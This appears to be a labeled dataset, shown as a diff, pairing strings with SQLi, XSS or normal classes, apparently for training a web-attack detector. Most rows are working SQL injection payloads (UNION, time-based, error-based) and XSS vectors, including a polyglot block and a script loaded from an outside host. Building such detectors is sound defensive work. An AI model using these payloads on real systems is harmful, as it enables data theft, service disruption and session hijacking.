'eftr,2,SQLi,20271 +"-6431' or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and 'ixix' like 'ixix",2,SQLi,15414 +"1"" where 6023 = 6023",2,SQLi,16298 +"1%' ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( '%' = '",2,SQLi,15551 +Select fly.,0,normal,24614 +"elt ( 5098 = 2728,1 )",2,SQLi,16491 +"></iframe><script>alert(123)</script> +<body onLoad=while(true) alert('XSS');"">",1,XSS,1267 +""") waitfor delay '0:0:20' --",2,SQLi,10841 +"select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ( 7240 = 7240",2,SQLi,15331 +"-7848%"" union all select 1580,1580,1580,1580,1580,1580,1580--",2,SQLi,18229 +"1"" ) as eefe where 5290 = 5290 and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #",2,SQLi,16102 +-1879%' ) ) or 3038 = 3038,2,SQLi,19510 +"-7001'+ ( select slav where 9321 = 9321 union all select 9321,9321,9321,9321,9321,9321,9321,9321,9321--",2,SQLi,12959 +-2241 ) where 7606 = 7606 or ( 8459 = 8459 ) *4906--,2,SQLi,13127 +I need to decide where to go for a nature hike.,0,normal,23877 +"Select Internet Protocol Version 4 (TCP/IPv4), and then click Properties.",0,normal,25586 +It seems that a select few celebrities certainly do not.,0,normal,25911 +"<br onmouseenter=""alert(1)"">test</br>",1,XSS,4218 +1' where 2673 = 2673,2,SQLi,13785 +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>",1,XSS,9516 +select case when 3995 = 8680 then 1 else null end--,2,SQLi,21783 +OLED?) when an old TV breaks and you must select a new one.,0,normal,25812 +"<i onmousemove=""alert(1)"">test</i>",1,XSS,2586 +"""More specifically, we began to adjust prices on select routes and in select cities based on costs and demand elasticities,"" said finance chief Brian Roberts of the select fare increases.",0,normal,26413 +"<frameset draggable=""true"" ondragstart=""alert(1)"">test</frameset>",1,XSS,8730 +"<button oncut=""alert(1)"" contenteditable>test</button>",1,XSS,3595 +"ABC<div style=""x:\xE3\x80\x80expression(javascript:alert(1)"">DEF",1,XSS,448 +"1%"" ) ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,17706 +"<dt onbeforecut=""alert(1)"" contenteditable>test</dt>",1,XSS,7537 +Bible - Visit your local Christian bookstore and select a special bible as a gift.,0,normal,26277 +1 ) where 6725 = 6725 and 1553 = 7419,2,SQLi,14003 +<video onpointerenter=alert(1)>XSS</video>,1,XSS,2804 +"<svg oncopy=""alert(1)"" contenteditable>test</svg>",1,XSS,3521 +-3938%' ) ) ) or 2034 = 7209#,2,SQLi,19387 +"<div id=""1""><form id=""test""></form><button form=""test"" formaction=""javascript:alert(1)"">X</button>//[""'`-->]]>]</div><div id=""2""><meta charset=""x-imap4-modified-utf7"">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//[""'`-->]]>]</div><div id=""3""><meta charset=""x-imap4-modified-utf7"">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//[""'`-->]]>]</div><div id=""4"">0?<script>Worker(""#"").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))//[""'`-->]]>]</div><div id=""5""><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(5)',384,null,'rsa-dual-use')</script>//[""'`-->]]>]</div><div id=""6""><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>//[""'`-->]]>]</div><div id=""7""><input onfocus=alert(7) autofocus>//[""'`-->]]>]</div><div id=""8""><input onblur=alert(8) autofocus><input autofocus>//[""'`-->]]>]</div><div id=""9""><a style=""-o-link:'javascript:alert(9)';-o-link-source:current"">X</a>//[""'`-->]]>]</div><div id=""10""><video poster=javascript:alert(10)//></video>//[""'`-->]]>]</div><div id=""11""><svg xmlns=""http://www.w3.org/2000/svg""><g onload=""javascript:alert(11)""></g></svg>//[""'`-->]]>]</div><div id=""12""><body onscroll=alert(12)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>//[""'`-->]]>]</div><div id=""13""><x repeat=""template"" repeat-start=""999999"">0<y repeat=""template"" repeat-start=""999999"">1</y></x>//[""'`-->]]>]</div><div id=""14""><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>//[""'`-->]]>]</div><div id=""15""><script>({0:#0=alert/#0#/#0#(0)})</script>//[""'`-->]]>]</div><div id=""16"">X<x style=`behavior:url(#default#time2)` onbegin=`alert(16)` >//[""'`-->]]>]</div><div id=""17""><?xml-stylesheet href=""javascript:alert(17)""?><root/>//[""'`-->]]>]</div><div id=""18""><script xmlns=""http://www.w3.org/1999/xhtml"">&#x61;l&#x65;rt&#40;1)</script>//[""'`-->]]>]</div><div id=""19""><meta charset=""x-mac-farsi"">¼script ¾alert(19)//¼/script ¾//[""'`-->]]>]</div><div id=""20""><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(20)}),x</script>//[""'`-->]]>]</div><div id=""21""><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(21)')()</script>//[""'`-->]]>]</div><div id=""22""><input onblur=focus() autofocus><input>//[""'`-->]]>]</div><div id=""23""><form id=test onforminput=alert(23)><input></form><button form=test onformchange=alert(2)>X</button>//[""'`-->]]>]</div><div id=""24"">1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(24)&gt;`>//[""'`-->]]>]</div><div id=""25""><script src=""#"">{alert(25)}</script>;1//[""'`-->]]>]</div><div id=""26"">+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);//[""'`-->]]>]</div><div id=""27""><style>p[foo=bar{}*{-o-link:'javascript:alert(27)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>//[""'`-->]]>]</div>",1,XSS,9040 +<video id=x tabindex=1 onactivate=alert(1)></video>,1,XSS,8506 +"<IMG SRC=x onmessage=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1131 +"1' and elt ( 1533 = 5695,5695 ) and 'ycgi' = 'ycgi",2,SQLi,19678 +"<track onmouseout=""alert(1)"">test</track>",1,XSS,4935 +"<style>:target {transform: rotate(180deg);}</style><script id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></script>",1,XSS,6139 +"<tbody draggable=""true"" ondragleave=""alert(1)"">test</tbody>",1,XSS,2052 +"-3059 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) )",2,SQLi,18195 +"ABC<div style=""x:\xE2\x80\x8Bexpression(javascript:alert(1)"">DEF",1,XSS,460 +<element id=x tabindex=1 ondeactivate=alert(1)></element><input id=y autofocus>,1,XSS,7116 +"-1791' union all select 9316,9316,9316,9316,9316,9316,9316,9316--",2,SQLi,15666 +or 1=1--,2,SQLi,9862 +<span id=x tabindex=1 onbeforedeactivate=alert(1)></span><input autofocus>,1,XSS,6707 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--",2,SQLi,10468 +Where's the medical clinic?,0,normal,23589 +"<embed oncut=""alert(1)"" contenteditable>test</embed>",1,XSS,3927 +1' where 8864 = 8864,2,SQLi,17960 +<tbody id=x tabindex=1 onbeforedeactivate=alert(1)></tbody><input autofocus>,1,XSS,3358 +"<h1 draggable=""true"" ondragend=""alert(1)"">test</h1>",1,XSS,3594 +"-3710 ) ) union all select 5770,5770,5770,5770,5770,5770,5770#",2,SQLi,17985 +"1%"" ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ""%"" = """,2,SQLi,12345 +<td onpointermove=alert(1)>XSS</td>,1,XSS,8197 +"1' or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and 'owwf' = 'owwf",2,SQLi,17006 +The guards force the inmates to select a shawish (leader) or select one themselves.,0,normal,25399 +Modi and his government do not have the courage to ban any of these Chinese apps. Indian citizens should ban Modi Govt's misconduct!!. Beware of shameless and selective deshbhakti!!!,0,normal,26446 +""" or """"&""",2,SQLi,11659 +Where's the castle?,0,normal,23493 +"<style>@keyframes slidein {}</style><picture style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></picture>",1,XSS,8040 +"1"" ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ""lxue"" like ""lxue",2,SQLi,12556 +"<style>:target {color:red;}</style><listing id=x style=""transition:color 1s"" ontransitionend=alert(1)></listing>",1,XSS,4694 +"1"" ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ""qblj"" like ""qblj",2,SQLi,14316 +Select the Pen icon and the Master icon to alter the tempo along the tracks.,0,normal,25550 +"<input onkeydown=""alert(1)"" contenteditable>test</input>",1,XSS,3311 +<canvas id=x tabindex=1 onactivate=alert(1)></canvas>,1,XSS,7095 +"-9135"" ) ) or 6872 = 6872 and ( ( ""fllx"" = ""fllx",2,SQLi,12316 +-3535%' ) ) ) or 5605 = 4660 and ( ( ( '%' = ',2,SQLi,17941 +"-8773%' ) ) ) union all select 8941,8941,8941,8941,8941,8941#",2,SQLi,18844 +"<img src=x onerror=\x00""javascript:alert(1)"">",1,XSS,639 +"<small draggable=""true"" ondragstart=""alert(1)"">test</small>",1,XSS,7949 +"<label onbeforecopy=""alert(1)"" contenteditable>test</label>",1,XSS,2291 +"<content onkeydown=""alert(1)"" contenteditable>test</content>",1,XSS,2465 +"1"" ) as kfvy where 7305 = 7305 or sleep ( 5 ) --",2,SQLi,21712 +"1 ) ) ) or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,16927 +"<style>@keyframes x{}</style><rb style=""animation-name:x"" onanimationend=""alert(1)""></rb>",1,XSS,1984 +Delete the irrelevant data.,0,normal,22734 +Select a painting for your living room.,0,normal,24025 +"-1376%"" ) ) ) or 3458 = 9503 and ( ( ( ""%"" = """,2,SQLi,14150 +<dir id=x tabindex=1 onfocus=alert(1)></dir>,1,XSS,5484 +"-1048%"" or 3038 = 3038",2,SQLi,14417 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#",2,SQLi,10353 +Join the fitness club for a healthier lifestyle.,0,normal,22902 +<p id=x tabindex=1 ondeactivate=alert(1)></p><input id=y autofocus>,1,XSS,2641 +"1%' ) ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( '%' = '",2,SQLi,16585 +Select your dream vacation.,0,normal,24233 +"1' ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ( 'jfwt' like 'jfwt",2,SQLi,17340 +"<script onLoad script onLoad=""javascript:javascript:alert(1)""></script onLoad>",1,XSS,374 +RANDOMBLOB(500000000/2),2,SQLi,10301 +select * from users where id = 1.<@$ or 1 = 1 -- 1,2,SQLi,11893 +"-7171%' ) ) union all select 5580,5580,5580,5580,5580,5580,5580,5580--",2,SQLi,16928 +"1"" ) ) as ljhz where 2416 = 2416",2,SQLi,12755 +<base onpointerout=alert(1)>XSS</base>,1,XSS,8257 +"1%' ) union all select null,null,null,null,null,null--",2,SQLi,20043 +The pressure on a select group of senators will be extreme.,0,normal,25355 +"<a class=bar href=""http://www.example.org"">www.example.org</a>",1,XSS,9007 +"-5581%' ) ) ) union all select 4266,4266,4266,4266,4266,4266,4266,4266,4266,4266#",2,SQLi,21618 +"1"" ) ) as turj where 1237 = 1237",2,SQLi,21498 +"-2256"" ) ) ) or 1971 = 4537#",2,SQLi,13782 +"1' and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and 'hstg' like 'hstg",2,SQLi,15930 +"-5969"" where 9248 = 9248 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,13153 +Where's the missing keychain?,0,normal,22560 +"1"" ) where 3943 = 3943 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,15975 +"Home Depot: Save up to 40% off select bedding, bath & bath essentials, up to 30% off select storage solutions.",0,normal,26044 +Otherhood arrives on Netflix and in select theaters on August 2.,0,normal,25760 +1' ) as wtev where 5283 = 5283,2,SQLi,20777 +"-5097' ) union all select 8992,8992,8992,8992,8992,8992,8992,8992,8992--",2,SQLi,14938 +"1' ) ) ) union all select null,null,null,null,null,null,null,null#",2,SQLi,19684 +ORDER BY 16#,2,SQLi,10183 +"<address onkeypress=""alert(1)"" contenteditable>test</address>",1,XSS,1714 +Where's your SQL support?,0,normal,23374 +"1 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) -- kvkk",2,SQLi,19715 +"1%"" ) ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ( ""%"" = """,2,SQLi,12631 +<button onblur=alert(1) id=x></button><input autofocus>,1,XSS,4074 +UNION ALL SELECT,2,SQLi,10005 +"1%"" ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ""%"" = """,2,SQLi,21876 +1' ) as ftyp where 5851 = 5851 or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,21216 +"STYLE=""width: expression(alert(''))",1,XSS,2442 +1'|| ( select 'zwcp' where 3333 = 3333,2,SQLi,17928 +"<head onbeforepaste=""alert(1)"" contenteditable>test</head>",1,XSS,3283 "/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> /><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />",1,XSS,554 -"<frame draggable=""true"" ondragenter=""alert(1)"">test</frame>",1,XSS,2393 -I need to decide where to dine this evening.,0,normal,24058 -Select store.,0,normal,24730 -1' in boolean mode ) and 7533 = 7533#,2,SQLi,21410 -"<STYLE>@im\port'\ja\vasc\ript:alert(""XSS"")';</STYLE>",1,XSS,264 -"<div draggable=""true"" contenteditable>drag me</div><q ondrop=alert(1) contenteditable>drop here</q>",1,XSS,6910 -"1' ) ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ( 'qeet' = 'qeet",2,SQLi,18038 -"<i onmouseleave=""alert(1)"">test</i>",1,XSS,7586 -"1' ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( 'jvll' like 'jvll",2,SQLi,15855 -"1 ) where 9012 = 9012 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,17895 -"1' ) ) ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ( 'gucd' = 'gucd",2,SQLi,14843 -"1 ) as wokl where 1368 = 1368 union all select null,null,null,null,null,null--",2,SQLi,17798 -"waitfor delay '0:0:5' and ( ""%"" = """,2,SQLi,15926 -"inurl:"".php?tag=""",1,XSS,9385 -I'm considering where to have dinner tonight.,0,normal,24069 -"<div draggable=""true"" contenteditable>drag me</div><tt ondragover=alert(1) contenteditable>drop here</tt>",1,XSS,7020 -</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>,1,XSS,9812 -<bgsound onpointerdown=alert(1)>XSS</bgsound>,1,XSS,6216 -select ( case when ( 1407 = 2741 ) then 1407 else 1407* ( select 1407 from mysql.db ) end ) #,2,SQLi,20432 -"<style>:target {transform: rotate(180deg);}</style><ul id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></ul>",1,XSS,7894 -"<hr onmouseup=""alert(1)"">test</hr>",1,XSS,7713 -"1"" and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )",2,SQLi,15694 -<svg><progress onload=alert(1)></progress>,1,XSS,2938 -"<span draggable=""true"" ondrag=""alert(1)"">test</span>",1,XSS,8125 -"<tt onkeydown=""alert(1)"" contenteditable>test</tt>",1,XSS,5199 -") RLIKE SLEEP(5) AND (1337"" LIKE ""1337",2,SQLi,11307 -"select pg_sleep ( 5 ) and ""%"" = """,2,SQLi,15065 -"<a href=""\xE2\x80\x88javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,475 -1 ) ) and 4637 = 1408 and ( ( 6509 = 6509,2,SQLi,19247 -"-4045 union all select 6857,6857,6857,6857,6857,6857,6857--",2,SQLi,13902 -<frame onpointerup=alert(1)>XSS</frame>,1,XSS,6673 -<select autofocus onfocus=alert(1)>//INJECTX,1,XSS,9898 -Select switch.,0,normal,24939 -"1"" ) as yzny where 4869 = 4869 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) --",2,SQLi,20897 -<video onpointerdown=alert(1)>XSS</video>,1,XSS,8640 -"-1644%' or make_set ( 9354 = 9354,7185 ) and '%' = '",2,SQLi,17953 -"<object onbeforepaste=""alert(1)"" contenteditable>test</object>",1,XSS,7474 -"1' ) ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( 'miba' = 'miba",2,SQLi,15292 -"admin"" or 1 = 1--",2,SQLi,11966 -"{""id"":null,""firstName"":""Jimmy"",""lastName"":""Ng"",""address"":""520 5TH AVE, MCKEESPORT PA 15132"",""city"":""649"",""telephone"":""5100111912""}",0,normal,25328 -"1' and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and 'pphf' = 'pphf",2,SQLi,18707 -"<a onmouseenter=""alert(1)"">test</a>",1,XSS,8566 -",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10960 -"1"" ) where 5794 = 5794 union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,17442 -Update the file.,0,normal,23063 -"-9445 ) as dmur where 4371 = 4371 union all select 4371,4371,4371,4371,4371,4371,4371,4371,4371,4371#",2,SQLi,22087 -"select * from users where id = 1 or \.<$ union select 1,@@VERSION -- 1",2,SQLi,12041 -"<img src=""livescript:document.vulnerable=true;"">",1,XSS,1477 -<animate onpointerdown=alert(1)>XSS</animate>,1,XSS,6499 -"1' ) as dvoy where 7906 = 7906 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12893 -"1"" or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,19887 -"<th onmousemove=""alert(1)"">test</th>",1,XSS,2605 -1'+ ( select ophz where 9158 = 9158 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) ) +',2,SQLi,13082 -"{""id"":null,""name"":""gradually touch""}",0,normal,25517 -""",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10962 -"1"" ) ) as exzo where 7518 = 7518 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) --",2,SQLi,17736 -"1' union all select null,null,null,null,null,null#",2,SQLi,16702 -ORDER BY 28#,2,SQLi,10336 +"Open the ""Settings"" menu on your PS4 and select ""Devices.""2.",0,normal,25772 +Select educate.,0,normal,24680 +Where's the therapy center?,0,normal,23586 +AND 7300=7300 AND 'pKlZ'='pKlZ,2,SQLi,10121 +if I select,0,normal,26015 +"-9389' where 5713 = 5713 union all select 5713,5713,5713,5713,5713,5713,5713,5713--",2,SQLi,17284 +"1' ) where 4778 = 4778 and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,19382 +Identify columns where needed.,0,normal,23240 +"select * from users where id = 1 union select @<@.,version ( ) -- 1",2,SQLi,11759 +Save $50 on select Fitbit trackers on Amazon See Details,0,normal,25689 +"<style>@keyframes slidein {}</style><form style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></form>",1,XSS,3255 +<shadow onfocusout=alert(1) tabindex=1 id=x></shadow><input autofocus>,1,XSS,3459 +"1"" ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ""vkqt"" = ""vkqt",2,SQLi,14320 +"select count ( * ) from generate_series ( 1,5000000 ) and 'fahy' like 'fahy",2,SQLi,16547 +"1' where 3760 = 3760 union all select null,null,null,null,null,null,null,null#",2,SQLi,18971 +"><script+src=https://wb.amap.com/channel.php?callback=alert(1337)""></script>",1,XSS,9754 +"1 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) # usus",2,SQLi,20573 +<caption onpointerenter=alert(1)>XSS</caption>,1,XSS,7871 +"1%"" or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ""%"" = """,2,SQLi,22031 +Where's your SQL objective?,0,normal,23400 +"-9445 ) as dmur where 4371 = 4371 union all select 4371,4371,4371,4371,4371,4371,4371,4371,4371,4371#",2,SQLi,21889 +"1'|| ( select 'eayf' where 5431 = 5431 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) ) ||'",2,SQLi,15545 +"<menuitem onmousedown=""alert(1)"">test</menuitem>",1,XSS,5227 +1'|| ( select 'qdkb' where 4331 = 4331,2,SQLi,18934 +<bdo id=x tabindex=1 onactivate=alert(1)></bdo>,1,XSS,1784 +Select dish.,0,normal,24500 +<menu id=x tabindex=1 onbeforeactivate=alert(1)></menu>,1,XSS,4485 +"<tbody onpaste=""alert(1)"" contenteditable>test</tbody>",1,XSS,2859 +-3937 ) ) or 3038 = 3038,2,SQLi,18466 +-4523 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ),2,SQLi,13226 +"<wbr onclick=""alert(1)"">test</wbr>",1,XSS,5858 +Delete page.,0,normal,23057 +Select where it counts.,0,normal,23335 +"-1676'|| ( select 'xzmu' from dual where 6373 = 6373 union all select 6373,6373--",2,SQLi,14858 +"<a href=""javas\x04cript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,416 +"<pre onmouseover=""alert(1)"">test</pre>",1,XSS,6232 +"document.querySelector("".example"")",1,XSS,2047 +"1"" ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ""fuus"" like ""fuus",2,SQLi,18110 +<button onDblClick=javascript:alert(1)>,1,XSS,9566 +"1"" ) ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( ""nevr"" like ""nevr",2,SQLi,15822 +"<meter onbeforepaste=""alert(1)"" contenteditable>test</meter>",1,XSS,2653 +"1 ) as ihan where 5298 = 5298 and elt ( 6587 = 3479,3479 ) --",2,SQLi,16729 +"<link oncut=""alert(1)"" contenteditable>test</link>",1,XSS,3635 +<optgroup onpointerenter=alert(1)>XSS</optgroup>,1,XSS,2798 +<script>alert(1)<!--INJECTX,1,XSS,9817 +"-5158' ) ) or make_set ( 9354 = 9354,7185 ) and ( ( 'noaj' like 'noaj",2,SQLi,14761 +"<style>@keyframes slidein {}</style><div style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></div>",1,XSS,7600 +"1 ) ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,17042 +"1' ) and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,17894 +<datalist onfocusout=alert(1) tabindex=1 id=x></datalist><input autofocus>,1,XSS,3726 +<ul id=x tabindex=1 onbeforeactivate=alert(1)></ul>,1,XSS,3404 +", begin declare @var varchar ( 8000 ) set @var = ' ...",2,SQLi,11870 +&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;,1,XSS,1394 +<body onfocusout=alert(1) id=x><iframe id=x>,1,XSS,8831 +<br/><hr/>feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>,1,XSS,9034 +"<svg><script xlink:href=data:,alert(1) />",1,XSS,9265 +"1"" ) as axua where 6718 = 6718",2,SQLi,20165 +<input2 onpointermove=alert(1)>XSS</input2>,1,XSS,7071 +Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser,1,XSS,1328 +"<base onmousedown=""alert(1)"">test</base>",1,XSS,7672 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20",2,SQLi,10326 +"1%' ) ) ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ( '%' = '",2,SQLi,14373 +"<div draggable=""true"" contenteditable>drag me</div><h1 ondragover=alert(1) contenteditable>drop here</h1>",1,XSS,2785 +<dd onpointermove=alert(1)>XSS</dd>,1,XSS,7250 +Our special Fortnite captains will select the top submissions as winners.,0,normal,25757 +"1 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) -- ztzu",2,SQLi,22324 &lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;,1,XSS,983 -"1"" ) ) ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( ( ""bizm"" = ""bizm",2,SQLi,21976 -"1 ) ) as queb where 2449 = 2449 union all select null,null#",2,SQLi,22592 -<noscript onpointerover=alert(1)>XSS</noscript>,1,XSS,5113 -"<style>@keyframes slidein {}</style><sub style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></sub>",1,XSS,2200 -"1"" ) ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ( ""atlz"" = ""atlz",2,SQLi,13218 -"<pre onkeyup=""alert(1)"" contenteditable>test</pre>",1,XSS,5805 -1 ) ) as ndrh where 6308 = 6308,2,SQLi,19649 -Select your defeat.,0,normal,25196 